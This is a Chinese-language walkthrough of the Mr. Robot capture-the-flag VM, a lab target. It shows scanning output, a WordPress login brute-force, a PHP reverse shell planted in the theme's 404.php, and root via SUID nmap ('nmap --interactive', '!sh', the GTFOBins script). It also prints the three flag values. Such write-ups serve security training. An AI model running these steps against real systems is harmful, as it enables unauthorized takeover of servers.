信息收集
扫描ip
┌──(root㉿kali)-[~]
└─# **arp-scan -l**
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b7:88:30, IPv4: 192.168.59.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.59.1 00:50:56:c0:00:08 VMware, Inc.
192.168.59.2 00:50:56:f9:c9:00 VMware, Inc.
192.168.59.135 00:0c:29:9e:37:57 VMware, Inc.
192.168.59.254 00:50:56:ff:0b:a0 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.503 seconds (102.28 hosts/sec). 4 responded
扫描端口
┌──(root㉿kali)-[~]
└─# **nmap -sS -sV -n -T4 -p- 192.168.59.135**
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-26 09:01 EDT
Nmap scan report for 192.168.59.135
Host is up (0.00060s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
MAC Address: 00:0C:29:9E:37:57 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.41 seconds
nmap -sS -sV -n -T4 -p- 192.168.59.135
-sS :使用 SYN 扫描(默认的 TCP 扫描类型)。
-sV
- -
sV:启用服务检测。 -version或A:同时进行服务检测、脚本扫描和 OS 检测。
• -T 0-5:设置扫描的时间模板,0 到 5 级,级别越低,扫描越慢但越隐蔽。
-p-: 全端口扫描-n就会阻止nmap执行反向 DNS 查找,直接使用提供的 IP 地址进行扫描。-O:启用 OS 检测。
┌──(root㉿kali)-[~]
└─# **nmap -p- -A -T4 192.168.59.135**
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-26 09:16 EDT
Nmap scan report for 192.168.59.135
Host is up (0.00065s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-server-header: Apache
MAC Address: 00:0C:29:9E:37:57 (VMware)
Aggressive OS guesses: Linux 3.10 - 4.11 (98%), Linux 3.2 - 4.9 (94%), Linux 3.2 - 3.8 (93%), Linux 3.18 (93%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 3.16 (91%), Linux 3.16 - 4.6 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.65 ms 192.168.59.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.73 seconds
┌──(root㉿kali)-[~]
└─# **dirb http://192.168.59.135**
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jun 26 09:22:07 2024
URL_BASE: http://192.168.59.135/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.59.135/ ----
==> DIRECTORY: http://192.168.59.135/0/
==> DIRECTORY: http://192.168.59.135/admin/
+ http://192.168.59.135/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.59.135/audio/
==> DIRECTORY: http://192.168.59.135/blog/
==> DIRECTORY: http://192.168.59.135/css/
+ http://192.168.59.135/dashboard (CODE:302|SIZE:0)
+ http://192.168.59.135/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.59.135/feed/
==> DIRECTORY: http://192.168.59.135/image/
==> DIRECTORY: http://192.168.59.135/Image/
==> DIRECTORY: http://192.168.59.135/images/
+ http://192.168.59.135/index.html (CODE:200|SIZE:1188)
+ http://192.168.59.135/index.php (CODE:301|SIZE:0)
+ http://192.168.59.135/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.59.135/js/
+ http://192.168.59.135/license (CODE:200|SIZE:19930)
+ http://192.168.59.135/login (CODE:302|SIZE:0)
+ http://192.168.59.135/page1 (CODE:301|SIZE:0)
+ http://192.168.59.135/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.59.135/rdf (CODE:301|SIZE:0)
+ http://192.168.59.135/readme (CODE:200|SIZE:7334)
+ **http://192.168.59.135/robots (CODE:200|SIZE:41)**
**+ http://192.168.59.135/robots.txt (CODE:200|SIZE:41)**
+ http://192.168.59.135/rss (CODE:301|SIZE:0)
+ http://192.168.59.135/rss2 (CODE:301|SIZE:0)
+ http://192.168.59.135/sitemap (CODE:200|SIZE:0)
+ http://192.168.59.135/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.59.135/video/
==> DIRECTORY: http://192.168.59.135/wp-admin/
+ http://192.168.59.135/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.59.135/wp-content/
+ http://192.168.59.135/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.59.135/wp-includes/
+ http://192.168.59.135/wp-links-opml (CODE:200|SIZE:228)
+ http://192.168.59.135/wp-load (CODE:200|SIZE:0)
**+ http://192.168.59.135/wp-login (CODE:200|SIZE:2754)**
+ http://192.168.59.135/wp-mail (CODE:403|SIZE:3018)
+ http://192.168.59.135/wp-settings (CODE:500|SIZE:0)
+ http://192.168.59.135/wp-signup (CODE:302|SIZE:0)
+ http://192.168.59.135/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.59.135/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.59.135/0/ ----
+ http://192.168.59.135/0/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.59.135/0/feed/
+ http://192.168.59.135/0/index.php (CODE:301|SIZE:0)
+ http://192.168.59.135/0/rdf (CODE:301|SIZE:0)
+ http://192.168.59.135/0/rss (CODE:301|SIZE:0)
+ http://192.168.59.135/0/rss2 (CODE:301|SIZE:0)
^C> Testing: http://192.168.59.135/0/unreg
dirsearch -u [http://192.168.59.135](http://192.168.59.135/)
全扫了,这是第二个工具,扫描告一段落
挨个分析文件,发现第一个key
key-1
073403c8a58a1f80d943455fb30724b9
威胁建模,漏洞分析
第一下抓包失误,端口之前切换了,忘了在插件中检测8081了
将数据包发送到攻击模块,进入设置
开始攻击,查看不同的数据长度,字典使用的是靶机给的字典
得到账号:Elliot/ER28-0652
渗透攻击
使用webshell脚本位置
┌──(root㉿kali)-[~]
└─# **locate webshell**
/usr/bin/webshells
/usr/share/webshells
/usr/share/applications/kali-webshells.desktop
/usr/share/doc/webshells
/usr/share/doc/metasploit-framework/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md
/usr/share/doc/metasploit-framework/modules/exploit/multi/http/monitorr_webshell_rce_cve_2020_28871.md
/usr/share/doc/metasploit-framework/modules/exploit/multi/http/sugarcrm_webshell_cve_2023_22952.md
/usr/share/doc/metasploit-framework/modules/exploit/unix/http/pfsense_diag_routes_webshell.md
/usr/share/doc/metasploit-framework/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
/usr/share/doc/webshells/changelog.gz
/usr/share/doc/webshells/copyright
/usr/share/icons/Flat-Remix-Blue-Dark/apps/scalable/kali-webshells.svg
/usr/share/icons/Flat-Remix-Blue-Dark/apps/scalable/webshells.svg
/usr/share/icons/hicolor/16x16/apps/kali-webshells.png
/usr/share/icons/hicolor/22x22/apps/kali-webshells.png
/usr/share/icons/hicolor/24x24/apps/kali-webshells.png
/usr/share/icons/hicolor/256x256/apps/kali-webshells.png
/usr/share/icons/hicolor/32x32/apps/kali-webshells.png
/usr/share/icons/hicolor/48x48/apps/kali-webshells.png
/usr/share/icons/hicolor/scalable/apps/kali-webshells.svg
/usr/share/kali-menu/applications/kali-webshells.desktop
/usr/share/metasploit-framework/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
/usr/share/metasploit-framework/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
/usr/share/metasploit-framework/modules/exploits/multi/http/sugarcrm_webshell_cve_2023_22952.rb
/usr/share/metasploit-framework/modules/exploits/unix/http/pfsense_diag_routes_webshell.rb
/usr/share/metasploit-framework/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
/usr/share/webshells/asp
/usr/share/webshells/aspx
/usr/share/webshells/cfm
/usr/share/webshells/jsp
/usr/share/webshells/laudanum
/usr/share/webshells/perl
/usr/share/webshells/php
/usr/share/webshells/asp/cmd-asp-5.1.asp
/usr/share/webshells/asp/cmdasp.asp
/usr/share/webshells/aspx/cmdasp.aspx
/usr/share/webshells/cfm/cfexec.cfm
/usr/share/webshells/jsp/cmdjsp.jsp
/usr/share/webshells/jsp/jsp-reverse.jsp
/usr/share/webshells/perl/perl-reverse-shell.pl
/usr/share/webshells/perl/perlcmd.cgi
/usr/share/webshells/php/findsocket
/usr/share/webshells/php/php-backdoor.php
**/usr/share/webshells/php/php-reverse-shell.php**
/usr/share/webshells/php/qsd-php-backdoor.php
/usr/share/webshells/php/simple-backdoor.php
/usr/share/webshells/php/findsocket/findsock.c
/usr/share/webshells/php/findsocket/php-findsock-shell.php
/var/lib/dpkg/info/webshells.list
/var/lib/dpkg/info/webshells.md5sums
/var/lib/dpkg/info/webshells.postinst
/var/lib/dpkg/info/webshells.prerm
使用php-reverse-shell 脚本进行反弹 修改ip为本地 然后nc监听即可。
┌──(root㉿kali)-[~]
└─# mkdir r1
┌──(root㉿kali)-[~]
└─# cd r1
┌──(root㉿kali)-[~/r1]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .
打开php-reverse-shell 将ip地址改为kali的地址,把里面的代码上传到WordPress的404.php页面
python -c "import pty;pty.spawn('/bin/bash')"
切换到bash模式,找home目录,然后找到robot用户,找到了第二个key,有密码但是没权限查看key
daemon@linux:/$ ls
ls
bin dev home lib lost+found mnt proc run srv tmp var
boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
daemon@linux:/$ cd home
cd home
daemon@linux:/home$ ls
ls
robot
daemon@linux:/home$ cd robot
cd robot
daemon@linux:/home/robot$ ls
ls
key-2-of-3.txt password.raw-md5
daemon@linux:/home/robot$ cat ke
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$ cat pass
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$
登录robot账户,查看第二个key
robot@linux:~$ cd ~
cd ~
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ ls -la
ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
robot@linux:~$ cat k
cat key-2-of-3.txt
**822c73956184f694993bede3eb39f959 //第二个key**
robot@linux:~$ cat p
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
后渗透攻击
sudo提权
然后 whoami、id、uname-a 查看权限比较低,需要提权
find / -perm -4000 -type f -exec ls -la {} 2> /dev/null \; #搜索相关二进制文件
find / -perm -u=s -type f 2>/dev/null
daemon@linux:/$ **find / -perm -u=s -type f 2>/dev/null**
find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
这里发现Nmap 可以使用这个进行提权
GTFOBINS:https://gtfobins.github.io/gtfobins/nmap/
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
**sudo nmap --interactive
nmap> !sh**
提权,登录到root账户,发现第三个key
robot@linux:/$ nmap -V
nmap -V
nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:/$ **nmap --interactive**
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> **!sh**
!sh
#
# whoami
whoami
root
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
//在root账户下了
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
**04787ddef27c3dee1ee161b21670b4e4 //第三个key=**
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
